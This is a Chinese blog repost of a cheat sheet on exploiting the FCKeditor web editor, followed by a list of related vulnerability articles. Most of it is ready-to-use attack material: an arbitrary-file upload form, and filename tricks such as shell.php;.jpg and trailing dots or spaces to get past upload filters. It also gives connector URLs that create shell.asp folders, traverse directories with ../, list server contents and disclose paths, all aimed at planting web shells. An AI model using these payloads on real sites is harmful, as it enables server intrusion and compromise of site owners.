分享一些关于Fckeditor漏洞利用总结

转载 2016年06月01日 13:25:10


转自:http://www.chncto.com/heikejishu/10684.html


分享一些关于Fckeditor漏洞利用总结

1.查看编辑器版本

FCKeditor/_whatsnew.html
—————————————————————————————————————————————————————————————

2. Version 2.2 版本
Apache+linux 环境下在上传文件后面加个.突破!测试通过。
—————————————————————————————————————————————————————————————

3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。
<form id=”frmUpload” enctype=”multipart/form-data”
action=”http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media” method=”post”>Upload a new file:<br>
< input type=”file” name=”NewFile” size=”50″><br>
< input id=”btnUpload” type=”submit” value=”Upload”>
< /form>
—————————————————————————————————————————————————————————————

4.FCKeditor 文件上传“.”变“_”下划线的绕过方法
很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。
4.1:提交shell.php+空格绕过
不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。
4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
—————————————————————————————————————————————————————————————

5. 突破建立文件夹
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
—————————————————————————————————————————————————————————————

6. FCKeditor 中test 文件的上传地址
FCKeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor/editor/filemanager/upload/test.html
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.html
—————————————————————————————————————————————————————————————

7.常用上传地址
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)
JSP 版:
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文
件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址。
—————————————————————————————————————————————————————————————

8.其他上传地址
FCKeditor/_samples/default.html
FCKeditor/_samples/asp/sample01.asp
FCKeditor/_samples/asp/sample02.asp
FCKeditor/_samples/asp/sample03.asp
FCKeditor/_samples/asp/sample04.asp
一般很多站点都已删除_samples 目录,可以试试。
FCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。
—————————————————————————————————————————————————————————————

9.列目录漏洞也可助找上传地址
Version 2.4.1 测试通过
修改CurrentFolder 参数使用 ../../来进入不同的目录
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp
根据返回的XML 信息可以查看网站所有的目录。
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
也可以直接浏览盘符:
JSP 版本:
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
—————————————————————————————————————————————————————————————

10.爆路径漏洞
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp
—————————————————————————————————————————————————————————————

11. FCKeditor 被动限制策略所导致的过滤不严问题
影响版本: FCKeditor x.x <= FCKeditor v2.4.3
脆弱描述:
FCKeditor v2.4.3 中File 类别默认拒绝上传类型:
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
Fckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!
而在apache 下,因为”Apache 文件名解析缺陷漏洞”也可以利用之,另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。
在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!
—————————————————————————————————————————————————————————————

12.最古老的漏洞,Type文件没有限制!
我接触到的第一个fckeditor漏洞了。版本不详,应该很古老了,因为程序对type=xxx 的类型没有检查。我们可以直接构造上传把type=Image 改成Type=hsren 这样就可以建立一个叫hsren的文件夹,一个新类型,没有任何限制,可以上传任意脚本!

—————————————————————————————————————————————————————————————

以上方法都是网上收集和在平时渗透中所总结的经验,可能有些有遗漏,发后再想起的时候再补充,也有自己没发现的就要靠各位基友们分享学习了!

Fckeditor常见漏洞的挖掘与利用整理汇总

查看编辑器版本 FCKeditor/_whatsnew.html ————————————————————————————————————————————————————————————— ...
  • lizhengnanhua
  • lizhengnanhua
  • 2014年08月09日 02:47
  • 28628

编辑器漏洞整理

1.常见的编辑器 常见的有Ewebeditor,fckeditor,ckeditor,kindeditor等等。 2.Ewebeditor编辑器 Ewebeditor是基于浏览器的、所见...
  • u011781521
  • u011781521
  • 2017年03月01日 15:15
  • 3655

FCK编辑器漏洞综合利用工具

  • 2014年08月12日 21:08
  • 44KB
  • 下载

i春秋:警惕您站上的“FCK编辑器”解析漏洞突破检测上传后

实验环境 实验环境 操作机:Windows XP 目标机:Windows 2003 目标网址:www.test.com实验工具:中国菜刀 实验目的 本课程带领大家...
  • hope_smile
  • hope_smile
  • 2015年06月01日 04:17
  • 4221

i春秋:通过案例学安全—“FCK编辑器”版本识别及信息收集技

实验环境 实验环境 操作机:Windows XP 目标机:Windows 2003 目标网址:www.test.com 实验目的 本课程带领大家学习如何查看“FC...
  • hope_smile
  • hope_smile
  • 2015年06月01日 04:16
  • 2187

FCK漏洞利用总结

前段时间,IIS解析漏洞被披露出来。IIS解析漏洞就是把shell文件命名为test.asp;z.jpg,test.asp;_gif之类格式的文件,会被当做asp,php,aspx等动态文件解析的问题...
  • xing_anksh
  • xing_anksh
  • 2013年09月30日 11:31
  • 6306

FCKEditor漏洞的解决方法

前段时间,IIS解析漏洞被披露出来。IIS解析漏洞就是把shell文件命名为test.asp;z.jpg,test.asp;_gif之类格式的文件,会被当做asp,php,aspx等动态文件解析的问题...
  • woshisap
  • woshisap
  • 2011年10月31日 17:53
  • 11033

文件上传漏洞和修复方案

现代互联网的web应用程序中,文件上传是一种常见的要求,因为它有助于一高业务效率。在大型社交网络程序中都支持文件上传功能。在博客,论坛,电子银行网络,会给用户和企业员工有效的共享文件。允许上传图片,视...
  • pygain
  • pygain
  • 2016年10月22日 15:11
  • 4140

Fckeditor 2.6.3 漏洞 EXP

  • eldn__
  • eldn__
  • 2013年06月28日 15:35
  • 9745

fckeditor <= 2.6.4 任意文件上传漏洞

  • cnbird2008
  • cnbird2008
  • 2013年07月16日 13:54
  • 5154
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:分享一些关于Fckeditor漏洞利用总结
举报原因:
原因补充:

(最多只允许输入30个字)